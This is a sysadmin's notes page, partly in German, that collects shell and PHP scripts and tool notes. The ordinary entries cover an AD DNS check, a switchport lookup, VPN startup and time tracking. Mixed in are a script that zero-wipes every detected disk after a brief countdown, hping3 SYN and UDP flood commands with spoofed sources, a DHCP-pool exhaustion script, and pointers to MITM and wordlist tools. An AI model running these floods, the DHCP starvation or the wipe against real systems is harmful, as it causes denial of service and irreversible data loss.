Need to have
wipe
#!/bin/bash
GRACE_TIME="10"
TIMES_OVERWRITE="2"
while (($GRACE_TIME > 0)) ; do
sleep 1
((GRACE_TIME--))
done
HARDDISKS=$(lsblk -p -d -n -l -o NAME,TYPE | grep -i disk | awk '{print $1}')
echo "MACHINE: "
echo "--------------------"
dmidecode --type '1'
echo "--------------------"
procCount=0
for CURRENT_HARDDISK in $HARDDISKS ; do
echo "Harddisk - $CURRENT_HARDDISK - Debug below"
echo "-------------------------"
for i in $(seq 1 $TIMES_OVERWRITE ) ; do
dd if=/dev/zero of=$CURRENT_HARDDISK bs=16M 2>&1 &
# https://stackoverflow.com/questions/356100/how-to-wait-in-bash-for-several-subprocesses-to-finish-and-return-exit-code-0
pids[${procCount}]=$!
((procCount++))
done
echo "-------------------------"
done
# https://stackoverflow.com/questions/356100/how-to-wait-in-bash-for-several-subprocesses-to-finish-and-return-exit-code-0
echo "Process Count Waiting: $procCount"
for pid in "${pids[*]}" ;
do
wait $pid
done
sync
checkDNSEntriesLDAP
Active Directory auf seine Konsistenz überprüfen - forward lookup und reverse lookup der Einträge sollten übereinstimmen
Getestet auf: Ubuntu 18.04
Pakete erforderlich: php , php-ldap , php-mbstring
Achtung ich benutze hier bewusst die tls verschüsselte Variante von ldap d.h. ldaps - die CA von der das Zertifikat für den AD Server unterschrieben wurde befindet sich unter /usr/share/ca-certificates/ und wurde mit dpkg-reconfigure ca-certififcates ins System „integriert“ auch der Hostname stimmt mit dem Hostnamen aus den Zertifikatsinfos überein
<?php
$server = "ldaps://AD_SERVER:636";
//domain user to connect to LDAP
$user = "STANDARD_USER_DOMAIN@DOMAIN_ACTIVE_DIRECTORY";
//user password
$passwd = "PASSWORD_STANDARD_USER_DOMAIN";
//zB: OU=EDV1,OU=Workstations,OU=Ressourcen,OU=VirtualSchool,DC=schule,DC=intern
$dn = array(0=>"DN_NAME_LDAP_PFAD1",1=>"DN_NAME_LDAP_PFAD2");
$search="(objectClass=computer)";
$errDNS=0;
$countAll=0;
$okDNS=0;
for ($j=0; $j<count($dn); $j++)
{
$ds=ldap_connect($server);
$r=ldap_bind($ds, $user , $passwd);
$sr=ldap_search($ds, $dn[$j], $search, array(0=>"dNSHostName",1=>"distinguishedName"));
$data = ldap_get_entries($ds, $sr);
$countAll+=$data["count"];
for ($i=0; $i<$data["count"]; $i++)
{
if(isset($data[$i]["dnshostname"][0]))
{
$ip=gethostbyname($data[$i]["dnshostname"][0]);
if($ip!=$data[$i]["dnshostname"][0])
{
$reverseLookup=gethostbyaddr($ip);
if(mb_strtolower($reverseLookup) != mb_strtolower($data[$i]["dnshostname"][0]) )
{
echo "FAIL Hostname: ".$data[$i]["dnshostname"][0]." IP: ".$ip." Reverse: ".$reverseLookup."\n";
$errDNS++;
}
else
{
$okDNS++;
}
}
else
{
echo "FAIL NO-IP Entry: ".$data[$i]["dnshostname"][0]."\n";
$errDNS++;
}
}
else
{
echo "FAIL NO DNSHostname: ".$data[$i]["distinguishedName"][0]."\n";
$errDNS++;
}
}
ldap_close($ds);
}
echo "Summary:\n";
echo "All Computer objects found: ".$countAll."\n";
echo "All Computer objects ok: ".$okDNS."\n";
echo "Consistency integrity: ";
printf("%.2f \n",(($okDNS/$countAll)*100));
echo "Errors computer count: ".$errDNS."\n";
echo "OU's that i looked for :\n";
print_r($dn);
echo "\n";
?>
mac-switchport
#!/bin/bash
function bailout
{
echo -en "ERROR: $1\n";
exit 2;
}
function run_ips
{
exit_codes=0
for i in $SWITCHES_IPS ;
do
$0 $i "$1" ;
exit_codes=$(($exit_codes + $?))
done
exit $exit_codes
}
function usage
{
echo -en "Usage: $0 ip-address-switch mac-address e.g. 00:75:2d:ee:5e:11\n";
echo -en "Usage: export SWITCHES_IPS="ip1 ip2 ip3" then $0 mac-address e.g. 00:75:2d:ee:5e:11\n";
exit 1;
}
OID_INTERFACE_AND_MAC="1.3.6.1.2.1.17.4.3.1.2"
which cut > /dev/null || bailout "command cut not found!"
which snmpwalk > /dev/null || bailout "command snmpwalk not found! Debian/Ubuntu package: snmp"
which xargs > /dev/null || bailout "command xargs not found!"
which sed > /dev/null || bailout "command sed not found!"
which printf > /dev/null || bailout "command printf not found!"
[[ -n "$SWITCHES_IPS" ]] && [[ $# == 1 ]] && run_ips $1
[[ $# != 2 ]] && usage
ip="$1"
mac="$2"
IFS=$'\n'
echo $mac | grep -q -P "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$"
[[ $? != 0 ]] && bailout "Not a correct MAC address format: $mac \n I need two digit hex mac address e.g. 00:1f:11:32:7f:1f"
while read line ;
do
mac_found=$(echo $line | cut -d"=" -f 1 | cut -d"." -f 12,13,14,15,16,17 | tr . ' ' | xargs printf '%02x:' | sed 's/\(.*\):/\1 /')
echo $mac_found | grep -q -i --fixed-strings $mac
if [ $? == "0" ]
then
interface_found=$(echo $line | cut -d":" -f 2 | tr -d ' ' )
number_macs=$(snmpwalk -v 1 -Os -c public "$ip" "$OID_INTERFACE_AND_MAC" | grep -c "^.*INTEGER: $interface_found$")
echo "SUCCESS;$ip;$mac;$interface_found;$number_macs"
exit 0
fi
done < <( snmpwalk -v 1 -Os -c public "$ip" "$OID_INTERFACE_AND_MAC" )
echo "ERROR;$ip;$mac;0;0"
exit 1
Roadworker-Start OpenVPN
Ich möchte eine Roadworker OpenVPN Datei mit verschlüsseltem Private Key in der XFCE
GUI starten nach dem Login
#!/bin/bash
temp_file=$(mktemp)
chmod 600 $temp_file
zenity --title "Roadworker VPN Password" --password > $temp_file
openvpn --daemon --writepid /tmp/roadworker.pid --config /home/urnilxfgbez/openvpn/roadworker.conf --askpass $temp_file
rm $temp_file
pgrep --pidfile /tmp/roadworker.pid
if [ $? == "0" ]
then
zenity --info --text="Konnte VPN erfolgreich starten pid: /tmp/roadworker.pid"
else
zenity --error --text="Konnte VPN nicht erfolgreich starten - passwort?"
fi
exit 0
pkexec --user root openvpn --daemon --writepid /tmp/roadworker.pid --config /home/urnilxfgbez/openvpn/roadworker.conf --askpass $temp_file
Einfache Zeitaufzeichnung
Benötigt wird zenity / dateutils
KUNDE1 / KUNDE2 .. durch zB: Stammkunden ersetzen
Erstellt Einträge unter /PFAD/STUNDEN/KUNDENNÀME_JAHRMONAT mit Datum/Von/Bis/Dauer/Tätigkeitsbeschreibung im CSV Format
Zeitaufzeichnung-Firma.sh
#!/bin/bash
PREFIX_TIME_RECORDING="/PFAD/STUNDEN/"
function getTime() {
timePattern="^[0-9]{2}\:[0-9]{2}$"
ok=0
while [[ $ok == 0 ]] ; do
time=$(zenity --entry --text="$1 im Format hh:mm")
if [[ $time =~ $timePattern ]]; then
ok=1
fi
done
echo $time
}
function bailout() {
zenity --error --text="$1"
exit 1
}
function getCustomerName {
customerName=$(zenity --list --editable --column="Kundenname" "KUNDE1" "KUNDE2" "KUNDE3" )
while [[ $customerName == "" ]] ; do
customerName=$(zenity --list --editable --column="Kundenname" "KUNDE1" "KUNDE2" "KUNDE3")
done
echo $customerName
}
function getActivity {
activityName=$(zenity --text="Tätigkeitbeschreibung" --entry)
while [[ $activityName == "" ]] ; do
activityName=$(zenity --text="Tätigkeitbeschreibung" --entry)
done
echo $activityName
}
function getDate {
datePattern="^[0-9]{2}\.[0-9]{2}\.[0-9]{4}$"
ok=0
curDate=$(date +%d.%m.%Y)
while [[ $ok == 0 ]] ; do
datiges=$(zenity --entry --entry-text="$curDate" --text="im Format dd.mm.yyyy")
if [[ $datiges =~ $datePattern ]]; then
ok=1
fi
done
echo $datiges
}
which dateutils.ddiff || (zenity --error --text="dateutils.ddiff not found. Consider installing: sudo apt-get install dateutils" ; exit 1)
beginTime=$(getTime "Beginnzeit")
endTime=$(getTime "Endzeit")
timeDiff=$(dateutils.ddiff $beginTime $endTime -f "%H:%M")
hours=$(echo $timeDiff | cut -d":" -f 1)
minutes=$(echo $timeDiff | cut -d":" -f 2)
minPercentage=$(echo "scale=2;$minutes/60" | bc -l)
[[ $minPercentage == "0" ]] && minPercentage=".00";
entryDate=$(getDate)
customerName=$(getCustomerName)
activityName=$(getActivity)
month=$(echo "$entryDate" | grep -o -P "\.[0-9]{1,2}\." ) ; month=$(echo "${month//.}")
year=$(echo "$entryDate" | grep -o -P "\.[0-9]{4}" ) ; year=$(echo "${year//.}")
CURRENT_MONTH="$PREFIX_TIME_RECORDING$customerName-$year$month.txt"
echo $CURRENT_MONTH
[[ ! -w "$CURRENT_MONTH" ]] && touch "$CURRENT_MONTH"
[[ ! -w "$CURRENT_MONTH" ]] && bailout "Cannot write to: $CURRENT_MONTH"
entryText="$entryDate;$beginTime-$endTime;$hours${minPercentage}h;$activityName\n"
echo -n -e "$entryText" >> $CURRENT_MONTH || bailout "Cannot write to: $CURRENT_MONTH CHECK MANUALLY !!!!";
zenity --info --text="SUCCESS: $CURRENT_MONTH : $entryText"
exit 0
dsniff suite
Dsniff suite:
http://monkey.org/~dugsong/dsniff/
Keywords: layer 2 attacks, arp spoofing, sniffing , man-in-the-middle attack, arpspoof, dsniff
hping3
In summary, the aim of SYN flood is sending lots of SYN packets to the
server and ignoring SYN+ACK packets returned by the server. This causes
the server to use their resources for a configured amount of time for
the possibility of the expected ACK packets arriving.
If an attacker sends enough SYN packets, this will overwhelm the server
because servers are limited in the number of concurrent TCP connections.
If the server reaches its limit, it cannot establish new TCP connections
until the existing connections which are in the SYN-RCVD state timeout.
SYN flood attacks can be performed with hping3.
Simple SYN flood:
root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
using eth0, addr: xxx.xxx.xxx.xxx, MTU: 1500
HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 0 data
bytes
hping in flood mode, no replies will be shown
Advanced SYN flood with random source IP, different data size, and
window size:
root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood
--rand-source TARGET_SITE
HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 120
data bytes
hping in flood mode, no replies will be shown
–flood: sent packets as fast as possible
–rand-source: random source address
-c –count: packet count
-d –data: data size
-S –syn: set SYN flag
-w –win: winsize (default 64)
-p –destport: destination port (default 0)
For detailed information see the manual.
UDP Flood
UDP is a protocol which does not need to create a session between two
devices. In other words, no handshake process required.
A UDP flood does not exploit any vulnerability. The aim of UDP floods is
simply creating and sending large amount of UDP datagrams from spoofed
IP’s to the target server. When a server receives this type of traffic,
it is unable to process every request and it consumes its bandwidth with
sending ICMP “destination unreachable” packets.
hping3 can be used for creating UDP floods:
root@kali:~# hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): udp mode set, 28
headers + 0 data bytes
hping in flood mode, no replies will be shown
–flood: sent packets as fast as possible
–rand-source: random source address
–udp: UDP mode
-p –destport: destination port (default 0)
For detailed information see the manual.
hping3 --count 2 --syn --destport 22 --tcp-timestamp 10.0.23.245
HPING 10.0.23.245 (eth0 10.0.23.245): S set, 40 headers + 0 data bytes
len=56 ip=10.0.23.245 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=65160 rtt=7.6 ms
TCP timestamp: tcpts=1138723235
len=56 ip=10.0.23.245 ttl=64 DF id=0 sport=22 flags=SA seq=1 win=65160 rtt=3.5 ms
TCP timestamp: tcpts=1138724235
HZ seems hz=1000
System uptime seems: 13 days, 4 hours, 18 minutes, 44 seconds
--- 10.0.23.245 hping statistic ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 3.5/5.6/7.6 ms
consumeDHCP
#!/bin/bash
NIC_INTERFACE="$1"
NUMBER="$2"
BRIDGE_NAME="br-dhcp"
function bailout
{
echo -e "$1"
echo -e "Usage: $0 nic Number_of_Ips"
echo -e "Usage: $0 clean"
exit 2
}
function clean
{
count="1"
tap_names="tap-foo-hoo"
while ( ip addr ls "$tap_names-$count" &>/dev/null )
do
echo "releasing: $tap_names-$count ..."
dhclient -r --no-pid -d -lf /var/lib/dhcp/dhclient-"$tap_names-$count".lease "$tap_names-$count"
ip li set dev "$tap_names-$count" down
ip li del "$tap_names-$count"
((count++))
done
pgrep -a "dhclient" | grep "tap-foo-hoo" | awk '{print $1}' | xargs kill -9 &>/dev/null
}
which macchanger > /dev/null || bailout "Cannot find macchanger : apt-get install macchanger"
which ip > /dev/null || bailout "Cannot find ip to create tap interface: apt-get install iproute2"
which dhclient > /dev/null || bailout "Cannot find dhclient: apt-get install isc-dhcp-client"
[[ $# != 2 && $# != 1 ]] && bailout "Parameters missing.."
if [ "$1" == "clean" ] ; then
clean
exit 0
fi
(( NUMBER > 0 )) || bailout "Number needs to be more than 0"
ip addr ls $NIC_INTERFACE &> /dev/null || bailout "Cannot find interface: $NIC_INTERFACE"
clean
ip li set dev $NIC_INTERFACE up
for i in $(seq 1 $NUMBER); do
tap_names="tap-foo-hoo-$i"
ip li add link $NIC_INTERFACE "$tap_names" type macvlan
ip li set dev "$tap_names" down
macchanger -r "$tap_names" > /dev/null
ip li set dev "$tap_names" up
dhclient --no-pid -lf /var/lib/dhcp/dhclient-"$tap_names".lease "$tap_names" &
done
exit 0
yersinia
http://www.yersinia.net/
keywords: Dos , DHCP flooding , vlan attack
sslstrip
http://www.thoughtcrime.org/software/sslstrip/
Keywords: man-in-the-middle
reptyr
man Auszug
"reptyr is a utility for taking an existing running program and attach‐ing it to a new terminal"
apt-get install reptyr
reptyr PID
crunch
usage: crunch <min-len> <max-len> [charset] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
or
usage: crunch <min-len> <max-len> [-f <path to charset.lst> charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
min-len is the minimum length string you want crunch to start at
max-len is the maximum length string you want crunch to end at
[charset] is optional. You may specify a character set for crunch to use on the command line or if you leave it blank crunch will use abcdefghijklmnopqrstuvwxyz as the character set. NOTE: If you want to include the space character in your character set you use enclose your character set in quotes i.e. "abc "
[-f <path to charset.lst> <charset-name>] is the alternative to setting the character set on command line. This parameter allows you to specify a character set from the charset.lst.
NOTE: You may either not specify a charset, you may specify a character set on the command line, or you may specify -f <path to charset.lst> <charset-name>. You can only do one.
[-t [FIXED]@@@@] is optional and allows you to specify a pattern, eg: @@god@@@@ where the only the @'s will change
[-s startblock] is optional and allows you to specify the starting string, eg: 03god22fs
[-o wordlist.txt] is optional allows you to specify the file to write the output to, eg: wordlist.txt
[-c number] is optional and specifies the number of lines to write to output file, only works if -o START is used, eg: 60 The ouput files will be in the format of starting letter-ending letter for example:
./crunch 1 1 -f /pentest/password/crunch/charset.lst
mixalpha-numeric-all-space -o START -c 60
will result in 2 files: a-7.txt and 8-\ .txt The reason for the slash in the second filename is the ending character is space and ls has to escape it to print it. Yes you will need to put in the \ when specifing the filename.
examples:
./crunch 1 8
crunch will display a wordlist that starts at a and ends at zzzzzzzz
./crunch 1 6 abcdefg
crunch will display a wordlist using the charcterset abcdefg that starts at a and ends at gggggg
./crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
crunch will use the mixalpha-numberic-all-space character set from charset.lst and will write the wordlist to a file named wordlist.txt. The file will start with a and end with " "
./crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog@@@ -s cbdogaaa
crunch will generate a 8 character wordlist using the mixalpha-number-all-space characterset from charset.lst and will write the wordlist to a file named wordlist.txt. The file will start at cbdogaaa and end at " dog "
keywords: wordlist-generator, wordlist, gen-wordlist, wordlists
hddtemp
hddtemp /dev/sdx
keywords: harddisk, hddtemp, temperature
soundconverter
soundconverter - GNOME application to convert audio files into other formats
Code: [Select]
apt-get install soundconverter
keywords: mp4 convert, convert audio , CONVERT, MP3, mp3 MP4, youtube-videos
transmageddon
apt-get install transmageddon
keywords: video converter, VideoConverter, converter , Video
iso erstellen
mkisofs -V Test -r Altaro_Backup/ > altaro_cd.iso
genisoimage -o c23x_intel_raid.iso C23x_INTEL_RAID/
keywords: iso, ISO, iso-erstellen, mkisofs, ISO-mount